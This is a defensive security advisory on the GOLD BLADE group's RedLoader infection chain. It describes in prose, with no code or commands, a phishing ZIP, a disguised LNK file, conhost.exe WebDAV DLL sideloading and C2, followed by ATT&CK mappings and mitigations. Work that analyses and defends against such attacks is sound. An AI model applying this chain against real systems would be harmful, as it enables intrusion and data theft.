The GOLD BLADE threat group has developed a novel infection chain to deploy their RedLoader malware, leveraging a remote DLL sideloading technique. The attack initiates with a malicious PDF link that entices the victim to download a ZIP archive. Inside this archive is a LNK (Windows shortcut) file disguised as a PDF document. When the victim executes this LNK file, it launches the legitimate Windows process conhost.exe. This process is then abused to perform a WebDAV request to a CloudFlare-hosted domain, from which it remotely sideloads a malicious DLL. DLL sideloading is a technique where a legitimate executable loads a malicious DLL, bypassing traditional security controls that might block direct execution of malware. The infection proceeds in two stages of RedLoader malware, ultimately establishing command and control (C2) communication channels to enable further malicious activities such as data exfiltration, persistence, or lateral movement. This attack chain combines multiple MITRE ATT&CK techniques: T1566 (Phishing), T1204 (User Execution), T1218 (Signed Binary Proxy Execution), T1140 (Deobfuscate/Decode Files or Information), T1055 (Process Injection), T1547.001 (Registry Run Keys/Startup Folder), and T1573 (Encrypted Channel). Observed in July 2025, this method demonstrates the adversary's ability to adapt and combine known techniques in novel ways to evade detection and bypass defenses. Indicators of compromise include specific file hashes and CloudFlare worker domains used for hosting malicious payloads. No CVE or patch is currently available, and no known exploits in the wild have been reported yet, but the sophistication and stealth of the attack chain pose a significant risk to targeted organizations.

For European organizations, the GOLD BLADE RedLoader infection chain represents a medium to high risk due to its stealthy execution and multi-stage payload delivery. The use of legitimate Windows binaries (conhost.exe) for DLL sideloading complicates detection by traditional antivirus and endpoint detection and response (EDR) solutions. Successful compromise could lead to unauthorized access, data theft, espionage, or disruption of critical services. Given the use of phishing and social engineering to initiate the attack, organizations with large user bases or those that frequently handle PDF documents are particularly vulnerable. The establishment of encrypted C2 channels enables persistent and covert communication, increasing the difficulty of incident response and remediation. The attack's reliance on CloudFlare domains for payload hosting may complicate attribution and takedown efforts. European entities in sectors such as finance, government, healthcare, and critical infrastructure could face significant operational and reputational damage if targeted. Additionally, the evolving nature of the attack chain indicates that threat actors are actively refining their tactics, which may lead to broader adoption and increased attack frequency in the near future.

1. Implement advanced email filtering and phishing detection solutions to block malicious PDF links and ZIP attachments before reaching end users. 2. Educate users on the risks of opening unexpected attachments, especially those masquerading as PDFs but are actually LNK files. 3. Employ application whitelisting and restrict execution of LNK files from email or untrusted directories. 4. Monitor and restrict the use of conhost.exe and other signed Windows binaries for anomalous network activity, particularly WebDAV requests to unusual external domains. 5. Deploy endpoint detection and response (EDR) tools capable of detecting DLL sideloading and process injection techniques. 6. Use network monitoring to identify suspicious outbound connections to CloudFlare worker domains or other uncommon hosts. 7. Regularly audit and harden registry run keys and startup folders to prevent persistence mechanisms. 8. Maintain up-to-date threat intelligence feeds and indicators of compromise (IOCs) to enable rapid detection and response. 9. Consider network segmentation and least privilege principles to limit lateral movement if a system is compromised. 10. Conduct regular security awareness training focusing on social engineering and spear-phishing tactics.